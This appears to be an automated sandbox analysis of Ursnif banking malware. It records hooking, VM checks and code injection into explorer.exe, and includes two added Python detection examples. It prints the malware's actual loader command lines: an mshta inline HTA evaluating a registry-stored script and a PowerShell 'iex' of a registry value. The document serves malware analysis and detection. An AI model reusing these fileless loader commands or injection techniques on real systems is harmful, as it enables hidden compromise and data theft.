Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6004
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7064 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7064 Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00A5E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00A6888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A74FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00A74FE1
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 38_2_03B5ECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A605EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00A605EF
Source: explorer.exe, 00000026.00000002.621856451.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 0000001B.00000003.419853645.000001F45AAA6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000026.00000000.477391550.000000000DCC9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000026.00000002.617365934.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000026.00000000.472597369.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 0000001B.00000003.419853645.000001F45AAA6000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000026.00000000.472597369.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6FC77 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00A6FC77
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A716A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_00A716A5

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: 920000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EB2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3080000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 5996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5792
Source: C:\Windows\explorer.exe Thread register set: target process: 1460
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 6516
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C63B12E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 920000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C63B12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EB2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3080000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
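The entries above record, for the same address 7FFA9B851580 in explorer.exe, a byte EB being written, a thread started at that address, the page protection flipped repeatedly between "execute and read and write" and "execute read", and later a byte 40 written there. EB is the opcode of a short jmp, and 40 is a REX prefix that commonly begins an x64 prologue, so this is the write-patch-restore pattern of an inline hook on a function in an already loaded module. The following is an added example, not code from the report or from the sample: it classifies the first instruction of a function prologue read from a live process against the bytes the function should start with. The "expected" prologue is constructed (push rbx; sub rsp, 20h) and is not taken from any real module; only the address is the one the report logs.

```python
"""Classify the first instruction of a function prologue read from a live
process against the bytes it should have.

Added example, not part of the sandbox report. PATCHED_ADDR is the address the
report logs; EXPECTED_PROLOGUE is a constructed x64 prologue, not bytes taken
from any real module.
"""
import struct
from typing import NamedTuple, Optional

PATCHED_ADDR = 0x7FFA9B851580                        # address from the report
EXPECTED_PROLOGUE = bytes.fromhex("40534883EC20")    # constructed: push rbx / sub rsp, 20h


class HookVerdict(NamedTuple):
    tampered: bool
    kind: Optional[str]     # spin_loop, jmp_rel8, jmp_rel32, push_ret, mov_rax_jmp_rax, unknown_patch
    target: Optional[int]   # resolved branch target when the first instruction is a branch


def classify_prologue(addr: int, expected: bytes, observed: bytes) -> HookVerdict:
    """Compare observed bytes with the expected prologue and decode the patch."""
    n = min(len(expected), len(observed))
    if n and observed[:n] == expected[:n]:
        return HookVerdict(False, None, None)
    b = observed
    if len(b) >= 2 and b[0] == 0xEB:                    # EB rel8: short jmp
        target = addr + 2 + struct.unpack("<b", b[1:2])[0]
        # EB FE branches to itself: a thread started there spins until the bytes are restored.
        return HookVerdict(True, "spin_loop" if target == addr else "jmp_rel8", target)
    if len(b) >= 5 and b[0] == 0xE9:                    # E9 rel32: near jmp
        return HookVerdict(True, "jmp_rel32", addr + 5 + struct.unpack("<i", b[1:5])[0])
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:   # 68 imm32 / C3: push target; ret (32-bit)
        return HookVerdict(True, "push_ret", struct.unpack("<I", b[1:5])[0])
    if len(b) >= 12 and b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":  # mov rax, imm64; jmp rax
        return HookVerdict(True, "mov_rax_jmp_rax", struct.unpack("<Q", b[2:10])[0])
    return HookVerdict(True, "unknown_patch", None)


# Constructed observations for the demo: the clean prologue, the two-byte spin
# loop, a near jmp forward by 0x1000, and an absolute trampoline into 0x3080000
# (a base the report lists as a target of a foreign write; the trampoline is assumed).
DEMO_OBSERVATIONS = {
    "clean":        EXPECTED_PROLOGUE,
    "spin":         bytes.fromhex("EBFE4883EC20"),
    "near_jmp":     bytes.fromhex("E900100000") + b"\x20",
    "trampoline":   bytes.fromhex("48B80000080300000000FFE0"),
}


def scan_demo() -> dict:
    """Classify every constructed observation against the expected prologue."""
    return {name: classify_prologue(PATCHED_ADDR, EXPECTED_PROLOGUE, obs)
            for name, obs in DEMO_OBSERVATIONS.items()}


if __name__ == "__main__":
    for name, verdict in scan_demo().items():
        tgt = f"{verdict.target:#x}" if verdict.target is not None else "-"
        print(f"{name:12} tampered={verdict.tampered!s:5} kind={verdict.kind} target={tgt}")
```

In a real check the expected bytes come from the module's on-disk image (relocations applied) and the observed bytes from ReadProcessMemory; a match on the first instruction alone is not proof of integrity, so compare the whole prologue and treat any branch out of the module's own image range as a hook candidate.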
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000026.00000000.458953977.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock
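The process creations listed above form one chain: mshta.exe runs an inline HTA whose script evals a registry value, the HTA starts powershell.exe, which reads a second value from the same HKCU key and Invoke-Expressions it, and that script drives csc.exe to compile a .cmdline file out of %TEMP% (the two Sigma rules the report cites, "MSHTA Spawning Windows Shell" and "Suspicious Csc.exe Source File Folder", cover the second and third steps). The following is an added example, not code from the report or from the sample, showing how those three steps are detected from process-creation events once the parent/child tree is rebuilt. The command lines in the sample events are the ones the report lists; the PIDs, parent PIDs, the Sysmon-style field names and the benign control case are assumptions, and the rule names are mine.

```python
"""Rebuild the process tree from process-creation events and flag the
mshta -> powershell -> csc.exe chain seen in this report.

Added example, not part of the sandbox report. The events below are
constructed: the command lines are the ones the report lists, the PIDs,
parent PIDs and the benign control case are invented so that the tree can
be rebuilt offline.
"""
import re
from typing import Dict, List, NamedTuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str      # full image path, as a Sysmon Event ID 1 "Image" field carries it
    cmdline: str


class Finding(NamedTuple):
    rule: str
    pid: int
    chain: str      # process ancestry, child first


SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
              r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software"
              r"\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"),
    ProcEvent(2200, 2100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'"),
    ProcEvent(2300, 2200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'"),
    # Benign control case (constructed): an interactive PowerShell started from explorer.
    ProcEvent(3000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Process"),
]


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


# Each rule sees the event and its parent (None when the parent was not logged).
RULES = [
    # Inline HTA that evals a registry value: the HTA body lives in the command line.
    ("mshta_inline_hta_regread", lambda ev, parent:
        _name(ev.image) == "mshta.exe"
        and re.search(r"about:<hta:application>", ev.cmdline, re.I) is not None
        and re.search(r"\.regread\(", ev.cmdline, re.I) is not None),
    # Second stage: powershell reads a value under HKCU and Invoke-Expressions it.
    ("powershell_iex_from_registry", lambda ev, parent:
        _name(ev.image) == "powershell.exe"
        and re.search(r"\biex\b|invoke-expression", ev.cmdline, re.I) is not None
        and re.search(r"\b(gp|get-itemproperty)\b[^)]*HKCU:", ev.cmdline, re.I) is not None),
    # "MSHTA Spawning Windows Shell": the parent, not the command line, is the tell.
    ("mshta_spawning_shell", lambda ev, parent:
        parent is not None and _name(parent.image) == "mshta.exe"
        and _name(ev.image) in {"powershell.exe", "pwsh.exe", "cmd.exe"}),
    # "Suspicious Csc.exe Source File Folder": compiling a .cmdline out of %TEMP%.
    ("csc_source_in_temp", lambda ev, parent:
        _name(ev.image) == "csc.exe"
        and re.search(r"\\AppData\\Local\\Temp\\[^']+\.cmdline", ev.cmdline, re.I) is not None),
]


def ancestry(by_pid: Dict[int, ProcEvent], ev: ProcEvent) -> str:
    names, seen, cur = [], set(), ev
    while cur is not None and cur.pid not in seen:    # guard against PID-reuse loops
        seen.add(cur.pid)
        names.append(_name(cur.image))
        cur = by_pid.get(cur.ppid)
    return " <- ".join(names)


def analyze(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    out: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for rule, pred in RULES:
            if pred(ev, parent):
                out.append(Finding(rule, ev.pid, ancestry(by_pid, ev)))
    return out


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:30} pid={f.pid:<5} {f.chain}")
```

The parent check is what separates this chain from an administrator typing iex into a console: the control event uses the same binary and is not flagged by any rule. On a real host the ancestry string also exposes the earlier hop the report does not show here, whatever started mshta.exe with that command line.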

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A604D7 cpuid 1_2_00A604D7
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_00A6B585
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00A5A027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00A67AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6B1E7 GetLastError,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,GetVersion,GetModuleHandleA, 1_2_00A6B1E7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
